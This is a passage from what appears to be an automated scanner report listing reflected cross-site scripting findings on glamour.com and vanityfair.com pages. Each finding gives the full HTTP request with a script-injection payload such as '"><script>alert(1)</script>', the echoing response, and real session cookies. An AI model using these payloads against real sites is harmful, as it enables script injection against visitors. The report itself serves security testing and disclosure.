Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Mon, 29 Nov 2010 17:32:38 GMT
Date: Mon, 29 Nov 2010 17:22:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<a href="/women-of-the-year/?5d5b9"><script>alert(1)</script>7809d4f0ec7=1&printable=true" title="Print this page">
...[SNIP]...

1.120. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glamour.com
Path:   /women-of-the-year/2010/dr-hawa-abdi-and-her-daughters

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c740f<img%20src%3da%20onerror%3dalert(1)>d581caebf96 was submitted in the REST URL parameter 1. This input was echoed as c740f<img src=a onerror=alert(1)>d581caebf96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /women-of-the-yearc740f<img%20src%3da%20onerror%3dalert(1)>d581caebf96/2010/dr-hawa-abdi-and-her-daughters HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.6
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:32:55 GMT
Date: Mon, 29 Nov 2010 17:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<span>women-of-the-yearc740f<img src=a onerror=alert(1)>d581caebf96</span>
...[SNIP]...

1.121. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.glamour.com
Path:   /women-of-the-year/2010/dr-hawa-abdi-and-her-daughters

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d029'%3bf665d01a035 was submitted in the REST URL parameter 1. This input was echoed as 3d029';f665d01a035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women-of-the-year3d029'%3bf665d01a035/2010/dr-hawa-abdi-and-her-daughters HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.6
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:32:52 GMT
Date: Mon, 29 Nov 2010 17:22:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<!--

CN.dart.init({site:'glamour.dart', zone: 'women_of_the_year3d029';f665d01a035;', kws:[ "f665d01a035","women-of-the-year3d029'","2010","dr-hawa-abdi-and-her-daughters"], charmap : {' ' : '+', '-' : '_'}});
//-->
...[SNIP]...

1.122. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glamour.com
Path:   /women-of-the-year/2010/dr-hawa-abdi-and-her-daughters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62801"><script>alert(1)</script>ea559ef5564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /women-of-the-year/2010/dr-hawa-abdi-and-her-daughters?62801"><script>alert(1)</script>ea559ef5564=1 HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Mon, 29 Nov 2010 17:32:41 GMT
Date: Mon, 29 Nov 2010 17:22:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<a href="/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters?62801"><script>alert(1)</script>ea559ef5564=1&printable=true" title="Print this page">
...[SNIP]...

1.123. http://www.vanityfair.com/archive/glee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /archive/glee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e2f"><script>alert(1)</script>2547fbaf1ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /archive/glee?b1e2f"><script>alert(1)</script>2547fbaf1ca=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:38 GMT
Date: Mon, 29 Nov 2010 16:49:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/archive/glee?printable=true&b1e2f"><script>alert(1)</script>2547fbaf1ca=1" title="Print this page">
...[SNIP]...

1.124. http://www.vanityfair.com/archive/harry-potter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /archive/harry-potter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fa7"><script>alert(1)</script>6311859b86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /archive/harry-potter?18fa7"><script>alert(1)</script>6311859b86d=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:34 GMT
Date: Mon, 29 Nov 2010 16:49:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/archive/harry-potter?printable=true&18fa7"><script>alert(1)</script>6311859b86d=1" title="Print this page">
...[SNIP]...

1.125. http://www.vanityfair.com/archive/prince-william [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /archive/prince-william

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c419f"><script>alert(1)</script>354a99042a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /archive/prince-william?c419f"><script>alert(1)</script>354a99042a1=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:37 GMT
Date: Mon, 29 Nov 2010 16:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/archive/prince-william?printable=true&c419f"><script>alert(1)</script>354a99042a1=1" title="Print this page">
...[SNIP]...

1.126. http://www.vanityfair.com/archive/writers-reading [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /archive/writers-reading

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac09"><script>alert(1)</script>8c447f10858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /archive/writers-reading?7ac09"><script>alert(1)</script>8c447f10858=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:30 GMT
Date: Mon, 29 Nov 2010 16:49:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/archive/writers-reading?printable=true&7ac09"><script>alert(1)</script>8c447f10858=1" title="Print this page">
...[SNIP]...

1.127. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-201010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /business/features/2010/10/greeks-bearing-bonds-201010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138f8"><script>alert(1)</script>b7693c314b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/features/2010/10/greeks-bearing-bonds-201010?138f8"><script>alert(1)</script>b7693c314b0=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:29 GMT
Date: Mon, 29 Nov 2010 16:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/business/features/2010/10/greeks-bearing-bonds-201010?printable=true&138f8"><script>alert(1)</script>b7693c314b0=1" title="Print this page">
...[SNIP]...

1.128. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-response-201010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /business/features/2010/10/greeks-bearing-bonds-response-201010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a50"><script>alert(1)</script>ec8baaf9988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/features/2010/10/greeks-bearing-bonds-response-201010?51a50"><script>alert(1)</script>ec8baaf9988=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:32 GMT
Date: Mon, 29 Nov 2010 16:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/business/features/2010/10/greeks-bearing-bonds-response-201010?printable=true&51a50"><script>alert(1)</script>ec8baaf9988=1" title="Print this page">
...[SNIP]...

1.129. http://www.vanityfair.com/business/features/2010/12/jean-pigozzi-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /business/features/2010/12/jean-pigozzi-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdd44"><script>alert(1)</script>dd3d18f3c78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/features/2010/12/jean-pigozzi-201012?cdd44"><script>alert(1)</script>dd3d18f3c78=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:30 GMT
Date: Mon, 29 Nov 2010 16:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/business/features/2010/12/jean-pigozzi-201012?printable=true&cdd44"><script>alert(1)</script>dd3d18f3c78=1" title="Print this page">
...[SNIP]...

1.130. http://www.vanityfair.com/contributors/bramble-trionfo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/bramble-trionfo

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b22"><script>alert(1)</script>8729d0e8bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/bramble-trionfo?d0b22"><script>alert(1)</script>8729d0e8bc6=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:55:07 GMT
Date: Mon, 29 Nov 2010 16:50:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/bramble-trionfo?printable=true&d0b22"><script>alert(1)</script>8729d0e8bc6=1" title="Print this page">
...[SNIP]...

1.131. http://www.vanityfair.com/contributors/james-wolcott [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/james-wolcott

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dad8"><script>alert(1)</script>7babe1fbb73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/james-wolcott?1dad8"><script>alert(1)</script>7babe1fbb73=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Expires: Mon, 29 Nov 2010 16:55:11 GMT
Date: Mon, 29 Nov 2010 16:50:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/james-wolcott?printable=true&1dad8"><script>alert(1)</script>7babe1fbb73=1" title="Print this page">
...[SNIP]...

1.132. http://www.vanityfair.com/contributors/juli-weiner [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/juli-weiner

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a1f"><script>alert(1)</script>b08ee1a73b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/juli-weiner?e5a1f"><script>alert(1)</script>b08ee1a73b3=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:55:09 GMT
Date: Mon, 29 Nov 2010 16:50:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/juli-weiner?printable=true&e5a1f"><script>alert(1)</script>b08ee1a73b3=1" title="Print this page">
...[SNIP]...

1.133. http://www.vanityfair.com/contributors/marnie-hanel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/marnie-hanel

